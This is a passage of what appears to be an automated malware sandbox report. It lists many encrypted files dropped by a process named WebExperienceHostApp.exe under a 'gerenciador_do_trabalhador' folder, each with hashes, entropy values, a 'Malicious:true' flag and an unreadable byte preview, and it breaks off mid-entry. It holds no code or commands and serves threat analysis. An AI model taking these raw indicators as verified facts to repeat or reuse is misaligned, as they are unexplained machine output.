                                                                  Preview:.q34.O...|/.....T.u..u.1...:..-.F.l.U.....+.F4..:R;..Z.@.?o.Z.......w..Q\.G)I...b..=..............U..Q..;"...=..........].9s......D.G.....k.m.uY]f.L4V.p.....=..p....J..J....6.....|....Cy.....PSf...aM..dq._....J....u."V'.B....d.L.|.k.xo.}..|..$...2M..rB.....{s.,tBFgF...<.}.B.B....[.8.f....<0....q9.n....h2.\..&n.....{C.28.Q..(....&..~.c....p?..6..).)f."D8..}Ka..NZ.......nT..W.E..|.so..|p.L.M.b..,.w..F...}..u.Wd.4\...dD.s..@.....L....l...;...|.]..i..{....i...-.....W.o.I.WX.Xl.@.....Q.*.1...D.+a%..._x/.]..B..l.?.tU.._.PTR....[.L.u|...=_...0.."3:....f.L.9..g..v.....M.ZU...))..y..{...'~\.^$..}4.H..k.............7.C...AP;..X7V..(bu.M.:M.B..S....m...h...\.h...[...~....H..%.,c....H.....JX~/d[<.i...&....Q....j...:....8w...|<l.a...b...?./%.P...C...0qv.i..!..d.1$v..w.6W..'...7.l.;.b.....A.9.oJ.&.k<H.I..>ro.....'.u....[3....N5.%.!......>...U..9..0..X...t....<..o@.$].s).......2..T...GUJR}.Oe.zF..O......%........r/g..e$P.\q`..S -C..C..?NS.e..ay..I!(...
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):34075
                                                                  Entropy (8bit):7.99419790942373
                                                                  Encrypted:true
                                                                  SSDEEP:768:Gsl2TD5b6dE9JS2tfrc9ViEvepTAf1IEMgH:GzTDQytfrc94EvemtH
                                                                  MD5:AC6719272D6956D378781BB6341E549E
                                                                  SHA1:F2EE51C53999DC6E608CCE7D7F94DFEC0BF01C34
                                                                  SHA-256:2FBE2C9FC3E8ECA9867D4640EACBF5F709FB957D64757979AC52D9EB4A478BD5
                                                                  SHA-512:1CF01E1325A6EF5633E0EE9320CDD7EB10B6E18D2726E62CC9DECAC53D4F6258243A2DF4005C01D4AB6EEE0872294CB2E9A791FEE3B93C80DE425EC8D7C741E9
                                                                  Malicious:true
                                                                  Preview:....|<..'.\..."...!..|..l!..t.......f.5.y....f.>...U.....z9o.6....I.......A)...~Y.M.....<p.7..i.Izs._.&)..c..V[...".TyRV.L....".KP...A.|...#u.]....|..}....}....M.H....Eg.&.<.....ou..-um.f)zA..*..T.b...W....Q[4l.&...1~.5.cB.kJ.ez._<.2o..x........h.H.~...>D.j.G.:.e......z...,.P..../.).;.K...R. >..'Z.^f......+#4. .w..;...`.....)k.....K.........qy.et?v..._...tce.....i.K...N.....55..~..Z..R.O...e"2..g..u%.....9.........w..4S....IZ...[@x...d"........f......}.I..........G..h..$j>wY.\Z..dv.|...*F..OQ...Oe...; .DFn....E......V...y.&.YgpL.IV.5.)X%....u..v:.F.8M.......e.......)?.4..{..UV..X...M......Y..;..O.._^X.j..7..a|.#..e.......7...oDh.5R...YD.)..nr.q.........'...f....}9$.].6.Z.'..P..h\.xgwo%>.>..].]S.'.4}r...H..=...V.".^[.Ng.u.W...4v..%p.2......*.w2b84.....?.....4..1..r..h/.JE.m.....?{:..I..d...[..t].o..^..dH.... @.3_..6.zg...c4..E..:....)...7..BS7.R.Q.F[..Y......g.....I.....#....W...<..Xe...G0..r.".:0..D.d?.D#T.:..[..p/.....X.nL..`.#.%.1.<fDB
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):82658
                                                                  Entropy (8bit):7.998200093294084
                                                                  Encrypted:true
                                                                  SSDEEP:1536:YdvxckIg4UNK5/ZWLNQMDivHEStvroUqFvuBvBLyFqdVLln7h6Jf65Z2a/mUfMGd:Cva7fyUZxgStvroJQpAFMpn74JfqAa//
                                                                  MD5:A23BE06811102A6A68C6F04ED143C8A2
                                                                  SHA1:D58CE4DB2F79B5ADA2203F00DB23ADEECE381AFB
                                                                  SHA-256:8D6BEFF91A3715E9D8CFAA38F2EDEDF08131D4D3E4DE190DD203749C32FE29D9
                                                                  SHA-512:D2DBD9C64DA5B87C791DCE94FB92D2FA86DE2A12B009F5A36AF8B4FF395ED45C54D68C8BF4961E6ABC13BE1E562E630A7B012606391824A01555B43657EED9F4
                                                                  Malicious:true
                                                                  Preview:...DW...}...[.8{"BN..6.-.:H.>.D#[.p~...D.C..s.Ms.....+/...O.....+..1 .#.. b].yK.]#p..9..I..E.....1^e.1..E..5Kw....$.....M........f./..B.]h....u.o.U...-.9.ne.L........;L.^.H.3L..d<.B......8!P.C....M.,C~B...2..$Hf.K.b...~.xI..`...V_..K...k..w(H3..@...dc....[P.k....L...}9..NR6...I..'t_{....=..Gr...S0i...F...^8o...Rv.5.N.R.G...=....=\*-x.......I.l.,.$.Fp.c..Hi...r.0o.........o!.BKs`vj...G`...Q..`...b#..f.....WTJ.P.<}9`....t..._.T@x....._yp@ 9.+...b.P...-iZ...,1.t.......-u.6J@ltpE...7..p.,a.....0cF1^...E....... .Z..E.......7.....R.4N..J..uU.!..I&.....z0h.O.rx#y.q..>..>.k.M.#........{T.G2..s.......L...._.Z^&.."..\.0?...Db+...Vx5....&<...(...d.N<..Cs...g.(.I..[.t.e...n......l.,.......j.....j+z.s.......8|`.sy.zO.."R.q.|.X`..../1.j..=......F,.*x..Z.=F.y.T.*7&...y.m.T..bE.U...@..VE..t.B....?....G.....{w..D'I..pUAwM..JC...*..*;7")s.....C[Q.M..j..7.v.J..7k>...rJ..&.q?..; .....4M\..}..b...HUu^&oH.\.2.p..1d<.I.>.G`I....,.....%<!.r*.J...7...*..u.|UK....a..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:OpenPGP Secret Key
                                                                  Category:dropped
                                                                  Size (bytes):25552
                                                                  Entropy (8bit):7.9935670475036895
                                                                  Encrypted:true
                                                                  SSDEEP:384:yJ/J8EY3KC1Wv2T3gzNpv6aVCHgT+k6h1ci9k7HAKU8Rt2K9Qnm/yf:qU3Kdv83gzNMpnhqsMr9Qnm/K
                                                                  MD5:B118DE4C565F9D26A5DFD05780C81E80
                                                                  SHA1:D338CE01C4C9A8B15333697A408BF3E8982378F2
                                                                  SHA-256:66CF1243D1DC57C256AC69A80341E13B00672F5A3DEDA12592A68E1A6C1D24F3
                                                                  SHA-512:E5E8D8CBDAD4846D1B3A594750410FC9EA6429A8D209A067FC80A9082086D82327C8C0BF86D02520CEAAA13CA596B020C77340EB25E59310C88F39B666413A7B
                                                                  Malicious:true
                                                                  Preview:..y.... 6c.v...z>.S.&.....Eku....pL...>.Rw..[..5`.jP..5......Pl......u.l..&Y]...T...0.y.Q.J.`0A..A....p.Z.[!rRs.C.@3'2`'h~.K"{......b;..}..|<.2.....i%....... a...R/...Y8YI-...oQ$.l\.0........Q..I..40..$p...F....Du1..*f..S-..........>...>2...J ..]...zrm...&K."~..0<.V.n:R.P....,\....-...3......./.T!Y...(...K.._.........1E.,i... ...J.w..]^.<?.#...'L./B.|w1..;./a.8.....M...:Qy1d0s.~<..c.Ym..R........J......x....B...e......P.W.*6...p&k"s...^...E~;rlG6.pu"..!..j*...(S.O..]r.MW.......$blc...(2g.`..].Bm..c6O.........[.(;....r.....Of.......7]u..C.=.D.Cx....J.g..$*..T........XM....4.4.z...w..B.2E.Y.Z.\.Qw..=...`.8j.b.O.h.J.a.....Y<...E.?.7.w..~0...\.+PY....4....,....1Z:..-.U......Q..........c$wn.w4l.e~..S6I1.].I.G~..f....cf-I..b....4..^.u...V.A....A.Qi)......!...ZU..+..YJ...1T..Iam..8EC..8.GD....N.F*<F......?..7...8..m..`'.1...r..G...J9.Q.6......=.Z..$`o.yV.........7.g.{3/w...dE.+.M]......h}.....v.).^M...-Pi&U."%...cx.>.0..S.7..$/C.....L1q.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):159374
                                                                  Entropy (8bit):7.998773738175384
                                                                  Encrypted:true
                                                                  SSDEEP:3072:X01tCIH8orGX/LUcN6vxDinsDZ+WBzJWkHLtmbx1eH03:X01EuGvYtv1P+WBVWkHLtm11D3
                                                                  MD5:3C6307C476A3683387EE6DB0DDAD1E0E
                                                                  SHA1:8CC3F346552397F3D91411055E3F299687AA81E4
                                                                  SHA-256:3DD1BFA0118F4C06861FE5EBE3D24C95B9B8DDE2A81F814E15D4B5FE3F6406D6
                                                                  SHA-512:0D342EFC0D1594A820AD8F92C0E8A339A8FE32E675EA96ACEAC2A0B78953A0F447E40D8C4EDECEAF799E5E6B9631ECA2ECE27653110CE6402D66C56953A6B26C
                                                                  Malicious:true
                                                                  Preview:..k...p....WO.e..dK.....j...=.l5..`...k`.#.^.O....7..o 0.K..H.WAo..+..k.T.....!.G@m...*:...A........^.dy..6...p...t..yt.f.)......nw...!g.E2).ku..e....._......$S.........Oz..]..2.b. '..|Xy1..&L....i3b...,m../..)0.%..U.6.MJ...S..........b..^SL...E....R:Mk.5e.6.r..I.*m.....y.[^....1.......u22...D0...^.b?.H.>UE...g.......h..O}..Jp.....n5.>C.UN.&e....Y&)_.).-._....KN .'..C..4......`2.".D...O..vV....A{...M.]?.w....R..4...+....X...p.|......+.81...B..?........H.H.D@S..... .}B.4.o.d.g...`p0.u. .....BZ92n%..W....#....`.......l.......k..{.i!..G...Z.n..\...=$.('...w(\..hgQ..%.a.=W.m....M...$.. \.8.Y...D....b%#8x..I...cDED=h.........P...C.}...8.V....S.T.'A..EG.e...|OJ..N.....R!.`..&.....}..Cm"...m....-...+c.h.@..jz.....OY....s{..j...ZTmM..cK.U@w..._.)..eC.....Ex1..5,..+..y.J...qY.(....=.....v.I...2I...fmCT.....p.<...~....s^.qd.wG.U.O....5.....a%.A.)....3......Q.......y..~Q.D5e.y...{Z&.. ....>...p5T..UV.?.>F.....o.[p...f............A..m.{%.s'm]C3
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):83177
                                                                  Entropy (8bit):7.997820367544763
                                                                  Encrypted:true
                                                                  SSDEEP:1536:Wa4N/yNuAxxMHliuIZ8Uoe6Vge7kaPL7JUGQ5cXOpgX2pr+43T:P4Fy9WdICNb7TXJUGQ5Qylpr+C
                                                                  MD5:931F81F2E32F5C2F7F7A68E7F23724B3
                                                                  SHA1:78BA60F09DB46BB22A03845B85E7575E773755EF
                                                                  SHA-256:175DFE67454227081AB166CF338CFB3854561F648BC4B9444CDF67D027EFAA72
                                                                  SHA-512:A87DF23ED28ECC5F43D6C3B4E589F4705002AF58C43813D32A2A1AA5FEA5038444C4E0458914BBDEBB78606D1B17B4B94A8068D62A01214C8EDD058860889FD5
                                                                  Malicious:true
                                                                  Preview:\.+..Z.z@I....ix..B..-.,...1;.......X.:I4.Z..R(..l....O..$K1.x...H.A.o..o...t-Q....V$.c..6o.s..a0..5.d.:P5.?........\..R.^..0.\.&+.bz.K ..z..P......P....o.G.;;..e......5..p$.=./.sz.. =....i..V);6...".....\.)];.'U.+ O..&=...=s...?....dbB.........[.._.....>.$p.....YC..I....@.E...(j.}.eo..).(.R.+'p..g..)+rs/...%........W..5...$.Z..t3..]W.....R..i...%.>.._....e.f+..h..T.....8..z*.GvW.<..>%..2..^.....?XV.....S.un.K.}1<..ZQ...)o6.....e.F....+.....)..>.xMC.$q.TN.|......}lX9t....V.>.N..,.C.(j>4....Wa.......O4.h!P.....V..k1.B..O....$2..........lV_.I.d....N..)...1.z...vm..e.)c......,..z.....5.......2.k.fQ}..d..%b.>.co}.rr.<.P ..PN...R.....)..nJ..A......Z.R|.1.........E.d.a.J..i{...[N..g2g9.d.7`D..}.m.6...'..\.\.......mG.....p.9..o......FKF..T....w.M...#..T.\..n.PH.(....Y..%*.9....$L~u...........XG_..~....O..H.%....6..:.'>f....:.X.M.Z)...\.F..ZCf.O..X...[.u.e.......]...{.\..6...f/.....XQ.G.N.a4...G..c..F.'...6I8.B... Hc.-.[.Xz.+(P.Q..h....[7.x].*.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):91144
                                                                  Entropy (8bit):7.997903537205584
                                                                  Encrypted:true
                                                                  SSDEEP:1536:uydEy2hCtdX7GLIdhZJx7t94YPjGDWlCMgzOUF8DCBQRVUNi4DAIlVCIOw1AVeFJ:ucDJAED7sq2nzJF6CyDU84DPy5w1AVeX
                                                                  MD5:248001727FB11F5C6B50AFBD2C4DCAD8
                                                                  SHA1:03BDD5C3B1951E957AC40CAB7126D7F844823209
                                                                  SHA-256:B6424483E87036C08D69758E3FC133A63765605E949E49EE7AD3ABAA7F57C6C8
                                                                  SHA-512:504C13286D588F74B27B023C7967F62025D747AA70A1349DDB48A57FD54E448E059CB0CB77542D1417199F5D0C7FC6ADE4BE998E7029FACEE31DA3A3D33D2F18
                                                                  Malicious:true
                                                                  Preview:.6..PJ...i..("..4.'4X..1............M....!.T......i...<h.|...W....Z.R.....4.|,~0...Un.n.%6.u.(..U`N%.<.;i...+z.....5.|.....d.#.s:.$g.iAy.y...&.@7.wEp.....7'.*~8.....+.^....9....l.")..AQB....Q..X^.L.H4.N.#dI....6..8.MF....ZW\.~8...i.l-.\".7P[.0.Q.u...B...&.|.`.0.L.S..6....Vy.CT....){....+...?PK3..C.[.....p...`...U...-L.t.....oP.ghT.../..p.Sn2p...0u.o...:^..?.huWu..&....@3z3S..]o.*,.Q.Iu.?bM=.<.......}..<.:v.2v..5.~.+.2....2._t...O.v$..:*:.[.."....Lh1..+b...Y}N DJ..s...,..3(1.....U.w."H.I9.j...Y...L...3As~S...R.vY......i..tKv...\jO...-..7.G.....j]."5...T..2.P:......./..q/.1.H.(_.e|;..WE&%....B.N....@...Y.h....%r...%...%..Q..{...Q.>+E.x._.3...k..9.......e..@qgb9.k1..$....1..5=...;......&.=.=.Y{_..i..gFA...V.....h.}z...M.)..5...7\~l..K.^...H[A}..........=.....pHW.....%.jeMWdyO...e[..)}....o..3.<.b...0..v........?.......f.N.c.].K..?.Z5V.oQj."t.0.....q.,.._.....9y...iBuM>k..Q.4......m.`........]4..P.5.xU......P..W._....vp.......thg...I.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:OpenPGP Public Key
                                                                  Category:dropped
                                                                  Size (bytes):85182
                                                                  Entropy (8bit):7.997953961827474
                                                                  Encrypted:true
                                                                  SSDEEP:1536:TpWbu8hSfroOuGhuI7QT2U3bmYRzmiDhY1wSLwZg3rXs9vPucmy99b/TiHe3YdRm:JjzoFGhu0W2EBjBULYvtmy7iHe3cbk
                                                                  MD5:C42541122EA3F92912C2C9F6B66436C7
                                                                  SHA1:7CB18EC967B1A7EF3419D88D904B3784522D5437
                                                                  SHA-256:C57FAA6E91193CDA62623DF55E4903BDFDA46CD48E3C1E6F3947A74B8A15048C
                                                                  SHA-512:81E3BF61BD468DCF5AF9AAB12B6DC2F4E5E8F4782B76D0996137A90C3B4A0768F6E09BB9B40AFB99DED9AE4D7B29F42AAC4C4FD53F57158FC537A64FC5865943
                                                                  Malicious:true
                                                                  Preview:.a.#..pl..>.M".]QBl..]F...........J;.89=..UZ1..X{.2.u...Bo..Ur..E.....4..f.......RG....B..5X.n.z..(..D...W.8h._.`\.r....'%C.7.>`r?....'.'.S.....2V.....V*YMf{B....k54jh.......;..E.....Y.[.v.a~.~.45...p?........sWg).T.A.E0.g.B$..!.l.Or.......C'8..!.<...?..L....:P.t.....[S.>.L.M)...YAl}....'.R..E......h?.....ig5..K.&.K>.S\#./'z.9.).N.....^..y.@.w.."4?8oh7e...c...&\..(.6..E.3%Ss.Q$..H..;.7. .j..B..M...)L.!..6..b3,w..GZ.y.Il..xb.#...l+...J...5.I..ww.Y.&__...(..P.....~.. ....W.o.....X..e.u.%+..=...M........zD..z".r.......?O.]..8A.=TV'.....0...+@@..#r../Q..O.|._s...)..F..7:.r..&.f....f...9.n@S..i.4..{..w.H"9.{.j....A......q...<{nk..5..u.......v.........~...-..r..u...F.Y..(.C..n..Q#.}..O\X>.7l.Js..(*...R.#b..\u&..L..R..E<.W..n...V.W.:k.,]R...x.....J..........x..3.r..(.......&.d...O.'.v..q.r_...5..C....[..5R..p......\.........T....#....a..F..q.. D....A.9.......P$H..<.5..).A...m...(..Ka.z....wZ;.?.x.......V[.7}*.)..#....9....SZ........=.....[To....\.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):100405
                                                                  Entropy (8bit):7.998190619536125
                                                                  Encrypted:true
                                                                  SSDEEP:3072:Q+WeOazbszKIwkxCydCTNNDQz1XwoH4k+xgwA3:1TbzbszKx5yQpNDwwN9A3
                                                                  MD5:2E8EFE34A781ABF1A05EB075197B5791
                                                                  SHA1:23999005B9DC0575591847A8F3C56CFFA45205FB
                                                                  SHA-256:1C821B066531B7AC9397EAFB60728FA7A4998611B0344AAE0F384C10552982FE
                                                                  SHA-512:2E930B202094D95AAF9835ECE7D9A415AE747B01E87F078C5799F57C3F557FD246118BEE6A05DD1CCFA0D62E67AB47B382766F732E95611183488A4F9AB021D6
                                                                  Malicious:true
                                                                  Preview:.SI.....@.%D.P...F`.....s.N..F.~.y.V.}x7w.Y.a.BT...C.C..KHPh..s.y..#m.U.HpI.H....|H..I.........;.$:...f...lx...q..jh...=]....;@......Ay.....(M|.&..d.8p.PH..h..........n...y........]..SZ..+.u.9Z....h.#...-...r.yX.S'X.$..NK.4.@.B..8,.*.}4.....FSF%..Lf9,RWub......Gk_...P'.zo....y(._......DU......z8..L....W...U`./.C....~.).@........9M?^l.b.h....-.58...H..#..D...c>.v...............j.K.EcE...|apNG........~]......+.5.0s2T.g.V]....!.n...Yir5.to..O#<Z.N.X..[qC.@[....`Y.6.Y%W..vX..........`.h...F95.[.vE.^..pVN.84..6...*.X.7h.w...4,=.$.e.&.F.^>[..M..UYd...P..2\..0.U.p...&...X....'...U..z....+W.xA..N8WLv...F.....bk.&"_e...".H.y.....u..$cj.$...iK..9..E..V2..rR..um...V.."l..Mc^..m.1.....[......^.+U.7..?z....+..}.7........@....Bs.......n.....+...?.......qSWx.......[.F.=..v...o.4.^(6..}.W....c.:.Dk.`.7...y.R.;.{..._.......k...Gl.o.fj..uI..[...S.....L.%............#Q.Ii},...(.?)X.r#.W.......S..|MT.....g..vV....@..%..u..7S/.".K..d...G..4......-.*...,.aL..|k
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):43583
                                                                  Entropy (8bit):7.995787073284486
                                                                  Encrypted:true
                                                                  SSDEEP:768:dO7hXlh8QsjFbzita7Or2u4/7Hv0bUPIv7YAh7R6MDKdavoHTedvXOeuiz6J7:dO7hqFbzs2uK7Hv0QAv7YmAGeaAzedxk
                                                                  MD5:BEC41F95F6524AC749D806AFA5DF4A00
                                                                  SHA1:87B4599511670F18EEF7021A84F3A39F74BC6A30
                                                                  SHA-256:95BBA1729C2856D38DE67007C0400D029CEB2952A14C03CB48C86ECBF1838824
                                                                  SHA-512:C59D1D06C0A7404C9035977CE607E8672532A17D1FFB7EC125653E4D89E38DE26C448A28B5EAFB3DF2D4F9E71A7D55EB34290DB3A2A20AC617422E4D3CD6558A
                                                                  Malicious:true
                                                                  Preview:$..k.L....f.C.......V.ir..W........Wb..P.......zq../..S..e..Jk.....q..]..@m.:Wf..."|....s.....)P.S...G.....7.;.N.a".`...CT..K...c...~..b..7B......62...X....[&..".....Pc.7(.W+.V..S.,L.|;........U...h.....Et.c.U9..`....f.J.-..E..a..iGH,.....6Q<......}(..))]..|z../..#.T.?....z\.{..*"..`.[...|..z.....3......`....s..X2...a5..Ai|.h.xiC.D..8.0....`r._ei.2j..M...3b...g...}b_7.........a~..B.VO.}.AK"!.1..ca.Q.8...S...=[.9.W.#....C.V..../...v..h.k)....#.;...D.1.5........\..k....j...^.....@.E..2..*.4.tbpN ...f...x.......5...@.I?.&|2..H/..0Ek.5c.&..>.Rj......;.V#..b.g....|&....t/.X..|.2..,."V^.l#...."5.....V...2.@.....h.8.8..;.J.I-.@.0.p?'.S..C`.b....I...v....Z)GK....Cm..j|i.;.;p...W}`+\*l...b.."..P..W...6..1...f?...}J.k.&..O..w..`..R^..'F!...`.J..)... .....v,.w|d.i...C-...{Y.+.,....I......Ia...MI.`..b.7S...2.......0...i.]...C4{.r...`...$u.}QM#...M..rAg...\0B*....We.\......).S.Z.>.}..<.....\..lD....I..i....%T....[S>c.A..].q.g)...Q*L........
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):90675
                                                                  Entropy (8bit):7.997679201177581
                                                                  Encrypted:true
                                                                  SSDEEP:1536:ziWmgTomDoBlH4giuP+d2oTW/SmsEnEcsn/yIvYPzUrsV0Gh3803kAEYIRyzixom:mMTve4gH2dVzXEnEj/yIg7Rx3803Dckw
                                                                  MD5:7A2C2F21A9735BA8D79CDFD2E2B11A05
                                                                  SHA1:B8E44B13551AE586CE2427EDD0ACBD6C065CE306
                                                                  SHA-256:4943B9DA5488B5F3E389F9A8E566537A4639763C8928A5D66E712D45ED9BC554
                                                                  SHA-512:3AA844969BAF33304886B3619000AADC82DF73A07B84559383B2A21C458DCBEADBB5DF0A7C6FE74C01A3C8882C3A99E81C23777498971690C9A89DCC303B8B32
                                                                  Malicious:true
                                                                  Preview:U/. ..P.....A.SO..%.A....|CYf.D.O.>.aY.{./#..{..J...e.d....D..J=H.7..%. z}...dB......W.z.t..5i..T...@6.L....3..[.H.q........}...Y....u../..8n.....A.!../...&.S..&.%>+SHrcy.....]M..6.M..X.I.n....(X.|a.. ....%....!g..|.m.?U........KU... ....q...6.g...K.a.X..)...."...-.{S....... Z;..m.Tq.\.A.....E.R..d..b..Nl......YXM.6.'v.h.Wf|..F.....>.....k.Z.....([pk6..70!11x..<."$^k7..G.s....&..y(..._..d......`.L.p.R;.[...2.+PL......=f...C.u...........G.)Oe...,...E.o.a,..B..M..i..3."........h.i*...Kz.J%..'&..p..$4.....~..]<5....[.Q...L....5.u...K.....M&./\eG9F.s...,I..sg...d.~.&.....Qw.pv~.Q?.......KD.G........&..._^...,.88.w...t.Wf.7..w..............;/x.#t.T..Y....m){.*....r+...y.XBh.:..|.........XF.z.:`....K..<d.a.j."..-...UT...cyI).@...bY.+.c...q.K.@...P.....A..M...-......+cx.....c!.xE.....ls..n..P`.J..#.y.5dwu....q.ix......F.Qk..X.....I~.....U..s.....+....`..m....j..Z.!......VpsDl....eM1f.sU`]5.q.r..])..9.o...o......2..*.:..0.(.T...D....|.aeg.....
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:PGP Secret Sub-key -
                                                                  Category:dropped
                                                                  Size (bytes):36824
                                                                  Entropy (8bit):7.995550572572611
                                                                  Encrypted:true
                                                                  SSDEEP:768:+8rr/EDdU0yKCPEO6eGSnllQhb5Ot6v+mWNtyKIHj:+8XsDMKi6KEh1O+D
                                                                  MD5:4F895E198F4195FE0E099522733C3454
                                                                  SHA1:3C47D29E6A01B3F621EBA58AEBABE7A1A998D2AB
                                                                  SHA-256:08A636D531CA33598EAA3D97C50E538FA75D0BA47A9D4819A2881F9D3792DFF0
                                                                  SHA-512:DF2084D02223E7671A28C8834A7E25B3E81DD173D3B56448ABDECC077308064DF2394856FFA6C45B504901F9D26295742F96F25B0BE0341CC5A90026A3B86642
                                                                  Malicious:true
                                                                  Preview:.M.....8J.KEe..M.6#@...Q.).@T;s..F.P..c*z...>./.a..W..I2......SFa$.......X.V..T.x.!H.%(H.....s...=gs........p......eeoq.J....?-.=..r..b..h........h...e..[..._2..6....A......F.A...u......,..;.....:......R./:I...H.kR..S.]E....1b)......;N.D.....x.w.,......&...u....0F..5..*..v.L]r./..Rk...c.........b.T.!.y.$..F$80..+K.K..a=..)Zj.w...tY...i.w......H..Y...".&n..9%.%..%@y8l....%.0.p....{>...j.H...'.R...l.T..'.[.#!P....%.....e\.^c\x}.....V;..h0L......7..*..;.NJ&o.b.6..u.0...z........Y.j.Nrf[\y...&.k..%.E.,hY....R.]..4t_.^.#.SR.QT...b....5. 9$.^p.S........~....rE...Y`;Z.@..cmOom.[..U...H..Zq..L {~".?..T....G..e.o.b...F.~W..G)u.*..J..8....).3.v..........=.7...8....W....D......}V...t..>......;..Q../........~N..9&..".$h*.\..0?.mE|.j.k..}.RP....I`..6...ql.U...q.....5+..?.N..9~..*S.....9.S........1.u......v.?.......D.......p.^D....J...G..Y..GC....w......F../..0X..k.Q....c...J.......E.H..:~..J......A.xA^....0...<.,b...j. N...5qm.v..@.l...............h
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):34231
                                                                  Entropy (8bit):7.994480734392986
                                                                  Encrypted:true
                                                                  SSDEEP:768:rO6t9pwy84bJlx8TsW/MnFp6UQ3Ep2UIRd0iTOT4VoEVEVcm3UccrEZc:X5brx5DF6wiTLVoemL3UU+
                                                                  MD5:387E6FD86B5FE22E6715053AAEEF5AEE
                                                                  SHA1:15CBD751849833474EF6A2A220ACB257436B9EE1
                                                                  SHA-256:0D5D5753B0497C798240D80FD4D2DDD8AF565DAE502429B6A4FB2EA406F212C1
                                                                  SHA-512:7B0FEDF111253B47A58C89634EE01A830B383858ECF21A608A44244919D23472A86CD289E553576815ACC196CE1FC9F7FC5BD8C489A5D52717FAF3E763939480
                                                                  Malicious:true
                                                                  Preview:.|.s..'.[.;Z.....0.*t.@N.c.rZ..V..p..>..f5...!..7.......d:..T.>.<..o....HT-.k.j.o.Jn?y.v.....R[h.=...31._.C....'.n..j.s\$.`..$f3...*....#'.R;..}P.x..-... .;.)...x..G..k..x}...}?j)Z...w~R...|.T...l..'hNp.bh:.....3.....U.$.......K.zl..P..UUp.Wkd.XZ...: .v.t.....3&k..+......#,...>./..u........v#.7.C$..K....Q2..0W.......{...yW&..3.:...4..5...?I.._Zo.C0....W.>.D..S.:6.yi..i=J..f.....,%.)N.\.cb......BjGS.n.R..l...-....TZ.UO....6d/.....6:..c..u3..`h....RD...24..x....l..T6..<..B*..O....#......N2.|HN.'..).Sy...`]..X..?.q...-w.......B..*....z.A.P....w.Z$.6l..*.z...(......xgv[o..c..|.....s.Y.[..X......lv....W}\i......v.b.J6......_....j..8k.~........m....R..X...b.........X<l../W.............wCb..!..s.i..;..(....#..g..E.#2...w.....e.xa.].....y(..nr.3dB/.c.}.b....1....^\n...V(....0..e.0..5.l$.. .r.4q..dr..m.$...[.....H..{...LU],..Qo.".NT..:..._.7*p.x;.$.Z.'.....).JQ..q...................A.m....MJ|.....x....(ca.;...^-z..D..+..v...b.l.4.D.^L....-Y.._c=.V.
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):91144
                                                                  Entropy (8bit):7.997857145974636
                                                                  Encrypted:true
                                                                  SSDEEP:1536:0sUPpMLUFKpKE4Zinvvc9jIWFdJjy6eRWOnOPgBHczwa8Orkj1to2I7S4Rgq:0sOcpKZI8VIWFddzeRYc85tr3JB
                                                                  MD5:10DDF6F8F750EE7255E2D93673C98AB6
                                                                  SHA1:30CA9E78DB96B55B7D47824F26F4B5228712189D
                                                                  SHA-256:5B07CEB8F27567C07BD1FD3AE05D55026AA5D19A1579FE2FC01EA8E2500BDDE8
                                                                  SHA-512:94EF2520A265A5DC00B26803EAAD5D45888474BA0824C630C28CD941F1605D042F9F7D539DBE22CD884BD201C26B629B7B512A57A4599444C9C738CF023F87DD
                                                                  Malicious:true
                                                                  Preview:...|.05...QR..99....e?+Y`....g...6....s.~.x._6D.+.%...=m.q.R...tg.....N.x.U...;..87.....)H..Y...vxb..7.*#.....m7.@......hZ.....puf..c......Ro.....4VH.r..u.j>.....|.>Z..,L.....X. IR.......[[`B.n...`...e..Z./..2M....$...`.=.x.).,.#ke.5..+.l3..6...2C..<VN?x=.....\V. ...Ls.5`3...7.IZ@.......%p.z...-....%.U...._.$9....Z...H.h...Q..(y+T>t..o...H..X.Ms....E.....X.F..pw#..*.R...wo.k....I.T.UAS.?Zn.RJ ...A...[^.........D..m%....0[......f.Y.>.po..r...+)..).#..r..V3......E.....o........e.pY.,.?-....g5..l...d.g...1....M.q...7$.hd....._=.......;.u...M..?..Q.....v_#..d.........|............k./.r.$\fHv.<...MX6...Z.zvY...Z..:.Y..x+2..`{.-.0iT.{...........IC....2.e.....A.B.T.dq!"{O.V..q.........+z.>.b..=.........].x..)2A.`>z)>..E....q.m.m..nW..s7.....o.(Mk(..q|...c.[.$K..f:2.[..W.9v@.e..5..v.....9..gU.1.._.Pk.).. ..!.i.....=.F..-.3.......t....^....s.z..|.STs.7.1b..........F.[...r`...3.9}.&q.Z..!=vQ.r.........7.S'o.f.Jq...,....!]l>.FkT.!..Qj:vR...(?.C..e..
                                                                  Process:C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):34109
